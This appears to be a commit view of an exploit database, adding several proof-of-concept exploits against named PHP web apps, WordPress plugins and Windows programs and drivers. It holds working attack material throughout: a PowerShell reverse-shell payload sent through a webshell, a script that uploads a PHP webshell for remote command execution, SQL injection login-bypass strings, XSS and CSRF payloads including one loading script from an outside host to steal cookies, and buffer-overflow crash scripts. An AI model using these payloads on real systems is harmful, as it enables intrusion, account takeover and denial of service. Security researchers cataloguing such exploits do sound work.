s.close()
sys.exit("[!] Program exited")
except socket.timeout:
pass
def start_shell(rhost, rport):
revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\""
revshell = revshell.encode('ascii')
revshell = base64.b64encode(revshell)
revshell = revshell.decode('ascii')
connection = requests.get(URL+"/lol.php?cmd=" + revshell)
print("[+] Starting to listen on port " + rport)
time.sleep(0.5)
threading.Thread(target=shell, args=(rhost, rport)).start()
time.sleep(2)
print("[+] Sending the reverse shell payload")
threading.Thread(target=start_shell, args=(rhost, rport)).start()

19
exploits/php/webapps/50307.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
# Exploit Author: Prunier Charles-Yves
# Date: September 20, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application
allowing the attacker to login with admin acount
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/expense_budget/admin/login.php
Username: admin' or ''=' --

129
exploits/php/webapps/50308.txt Normal file
View file

@ -0,0 +1,129 @@
# Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: 2021-09-21
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Version: 2.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
# RCE via executing exploit:
# Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/
import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
print(Style.BRIGHT+" Budget and Expense Tracker System 1.0")
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)
print(r"""
______ _______ ________
___ //_/__ /_______ ___ _______ ______(_)_____ _
__ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/
_ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /
/_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/
/___/
abdullahkhawaja.com
""")
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")
def webshell(LINK, session):
try:
WEB_SHELL = LINK+'/uploads/'+filename
getdir = {'cmd': 'echo %CD%'}
r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies)
status = r2.status_code
if status != 200:
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
r2.raise_for_status()
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', r2.text)
cwd = cwd[0]+"> "
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
while True:
thought = input(term)
command = {'cmd': thought}
r2 = requests.get(WEB_SHELL, params=command, verify=False)
status = r2.status_code
if status != 200:
r2.raise_for_status()
response2 = r2.text
print(response2)
except:
print("\r\nExiting.")
sys.exit(-1)
#Creating a PHP Web Shell
phpshell = {
'img':
(
'shell.php',
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
'application/octet-stream',
{'Content-Disposition': 'form-data'}
)
}
# Defining value for form data
data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'}
def id_generator():
x = datetime.datetime.now()
date_string = x.strftime("%y-%m-%d %H:%M")
date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
timestamp = datetime.datetime.timestamp(date)
file = int(timestamp)
final_name = str(file)+'_shell.php'
return final_name
filename = id_generator()
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies)
shell_upload = True if("1" in upload.text) else False
u=shell_upload
if u:
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
#Executing The Webshell
webshell(LINK, s)

13
exploits/php/webapps/50349.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
# Date: 2/15/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip
# Version: 1.3.1
# Tested on: Windows 10
# CVE: CVE-2021-24287
1. Description:
The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);

40
exploits/php/webapps/50362.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Blood Bank System 1.0 - Authentication Bypass
# Date: 30-9-2021
# Exploit Author: Nitin Sharma (vidvansh)
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/
# Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230
# Version: 1.0
# Tested on: Windows 10 , Apache , Mysql
# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
#Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php.
Step 2 Enter anything in username and password
Step 3 Click on Login and capture the request in the burp suite
Step4 Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
Step 5 Click forward and now you will be logged in as admin.
# PoC:
GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/login.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
# Authentication Bypass:
# Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password =>
Username: ** Random email**
Password: ' or 1 -- -

45
exploits/php/webapps/50372.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass
# Date: 2021-09-20
# Exploit Author: Nitin Sharma(vidvansh)
# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
# Version: v1.0
# Tested on: Windows 10 - XAMPP Server
# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
#Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php.
Step 2 Enter anything in username and password
Step 3 Click on Login and capture the request in the burp suite
Step4 Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
Step 5 Click forward and now you will be logged in as admin.
# PoC:
POST /lodge/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/lodge/admin/login.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+
# Authentication Bypass:
# Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password =>
Username: ' or 1 -- -
Password: ' or 1 -- -

21
exploits/php/webapps/50460.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS)
# Date: 10/27/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://supsystic.com/
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.18
# Tested on : Windows 10
#Poc:
1. Install Latest WordPress
2. Install and activate plugin.
3. Open plugin, click "Add New Form" and select any form.
4. Click "Fields" tab and "Add New Field". Choose whatever you want.
5. Inject JavaScript payload which is mentioned below into 'label' field, save and alert will appear on the screen.
Payload : <img src=x onerror=alert(1)>

47
exploits/php/webapps/50461.html Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)
# Date: 2021-10-27
# Exploit Author: Anubhav Singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: V 2.1
# Vulnerable endpoint: http://localhost/hostel/hostel/my-profile.php
# Tested on Windows 10, XAMPP
Steps to reproduce:
1) Navigate to http://localhost/hostel/hostel/my-profile.php
2) Enter xss payload "><script src=https://anubhav1403.xss.ht></script> in name field
3) Click on Update Profile and intercept the request in Burpsuite
4) Generate a CSRF POC of Update Profile
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/hostel/hostel/my-profile.php" method="POST">
<input type="hidden" name="regno" value="123456" />
<input type="hidden" name="fname" value=""><script&#32;src&#61;https&#58;&#47;&#47;anubhav1403&#46;xss&#46;ht><&#47;script>" />
<input type="hidden" name="mname" value="Hello" />
<input type="hidden" name="lname" value="Singh" />
<input type="hidden" name="gender" value="male" />
<input type="hidden" name="contact" value="12345678995" />
<input type="hidden" name="email" value="anubhav&#64;gmail&#46;com" />
<input type="hidden" name="update" value="Update&#32;Profile" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
5) Send this POC to victim
6) When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires.
7) Now attacker get's the details of victim like ip address, cookies of Victim, etc
8) So attacker is able to steal Victim's cookies successfully!! Account takeover!!!
#POC
https://ibb.co/jVcZxnt
https://ibb.co/DwGh4x9

25
exploits/windows/dos/49337.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
# Date: 22.12.2020
# Software Link: http://www.tucows.com/download/windows/files/ezcdsetup.exe
# Exploit Author: Achilles
# Tested Version: 4.13
# Tested on: Windows 7 x64 Sp1
# 1.- Run python code :Creator.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Easy CD & DVD Cover Creator.exe
# 4.- Press Unlock Now
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number'
# 5.- Press 'Continue'and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

20
exploits/windows/dos/49964.py Executable file
View file

@ -0,0 +1,20 @@
# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Version: 1.6.8
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Go to Register > Enter Registration Code...
#3.- Write anything in 'Name' field
#4.- Paste clipboard in 'Key' field
#5.- Click on button -> Ok
buffer = "\x41" * 256
f = open ("NBM.txt", "w")
f.write(buffer)
f.close()

21
exploits/windows/dos/49965.py Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.3.0
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Open Nsauditor.exe
#3.- Go to Register > Enter Registration Code...
#4.- Write anything in 'Name' field
#5.- Paste clipboard in 'Key' field
#6.- Click on button -> Ok
buffer = "\x41" * 256
f = open ("NBM.txt", "w")
f.write(buffer)
f.close()

38
exploits/windows/dos/50266.py Executable file
View file

@ -0,0 +1,38 @@
# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
# Date: 9/5/2021
# Exploit Author: Eric Salario
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/en-us/download
# Version: 10.0.2909.0 (32 and 64 bit)
# Tested on: Microsoft Windows 10 32 bit and 64 bit
=========================================================================
buffer = "//"
buffer += "A" * 423
f = open ("path.txt", "w")
f.write(buffer)
f.close()
1. Run the python script
2. Open SmartFTP > New Connection > FTPS (explicit)
3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
4. In Path, copy paste the content of the "path.txt" generated by the python script
5. Click "OK"
6. SmartFTP client crashes
=======================================================================
1. Open SmartFTP > New Connection > FTPS (explicit)
2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
3. In Path, type slash ("/") and click "OK"
4. The app should return "Error 0x80072741"
5. In the path's search bar, replace slash ("/") with whatever and press enter
6. SmartFTP client crashes
=======================================================================
1. Open SmartFTP
2. In the "New Connection" bar, clear the history (dropdown to the right of the bar)
3. Once the history is empty, click the bar and type anything
3. SmartFTP client crashes

300
exploits/windows/dos/50311.py Executable file
View file

@ -0,0 +1,300 @@
# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
# Date: 2021/04/07
# Exploit Author: Quadron Research Lab
# Version: all version
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr
import ctypes, sys
from ctypes import *
import io
from itertools import product
from sys import argv
devicename = "GM312Fltr"
ioctl = 0x22245C
ioctl_list = '''
0x22245C
0x222440
0x222441
0x222400
0x222404
0x222408
0x222420
0x222424
0x222448
0x222450
0x22245c
0x222460
'''
kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None)
if not hevDevice or hevDevice == -1:
print ("Not Win! Sorry!")
else:
print ("OPENED!")
buf = 'A' * 2000
bufLength = 2000
kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
[Bugcheck Analysis]
Fatal System Error 0x000000f7
(0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000)
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus
fffff807`2e1feb90 cc int 3
0 kd !analyze
Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
........................
Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long.
Run !sym noisy before .reload to track down problems loading symbols.
........................................
.............................
Loading User Symbols
.............................................
Loading unloaded module list
........
Bugcheck Analysis
DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer. This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned. This is the classic buffer overrun
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments
Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack
Arg2 0000f80736bc1742, Expected security check cookie
Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie
Arg4 0000000000000000, zero
Debugging Details
------------------
BUGCHECK_CODE f7
BUGCHECK_P1 bebea1caeaf0a2c1
BUGCHECK_P2 f80736bc1742
BUGCHECK_P3 ffff07f8c943e8bd
BUGCHECK_P4 0
PROCESS_NAME pythonw.exe
SYMBOL_NAME GM312Fltr+e1e
MODULE_NAME GM312Fltr
IMAGE_NAME GM312Fltr.sys
FAILURE_BUCKET_ID 0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function
FAILURE_ID_HASH {b8e05604-2a11-789a-ad29-fc4916710f2d}
Followup MachineOwner
---------
0 kd kb
RetAddr Args to Child Call Site
fffff807`2e312d12 fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 nt!DbgBreakPointWithStatus
fffff807`2e3122f6 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 nt!KiBugCheckDebugBreak+0x12
fffff807`2e1f6df7 fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 nt!KeBugCheck2+0x946
fffff807`36bc0e1e 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd nt!KeBugCheckEx+0x107
fffff807`36bc0ea7 fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720 GM312Fltr+0xe1e
fffff807`2e1ffbaf fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 GM312Fltr+0xea7
fffff807`2e087547 fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d nt!RtlpExecuteHandlerForException+0xf
fffff807`2e086136 ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 nt!RtlDispatchException+0x297
fffff807`2e1f7b82 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 nt!KiDispatchException+0x186
fffff807`2e1f7b50 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 nt!KxExceptionDispatchOnExceptionStack+0x12
fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 nt!KiExceptionDispatchOnExceptionStackContinue
fffff807`2e204ae0 ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 nt!KiExceptionDispatch+0x125
fffff807`2e1fe0c7 fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 nt!KiGeneralProtectionFault+0x320
fffff807`2e1fda76 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 nt!SwapContext+0x377
fffff807`2e00c970 ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 nt!KiSwapContext+0x76
fffff807`2e00be9f ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 nt!KiSwapThread+0x500
fffff807`2e00b743 ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 nt!KiCommitThreadWait+0x14f
fffff807`36bc0ca2 ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 nt!KeWaitForSingleObject+0x233
fffff807`36bc0b5d ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 GM312Fltr+0xca2
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 GM312Fltr+0xb5d
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
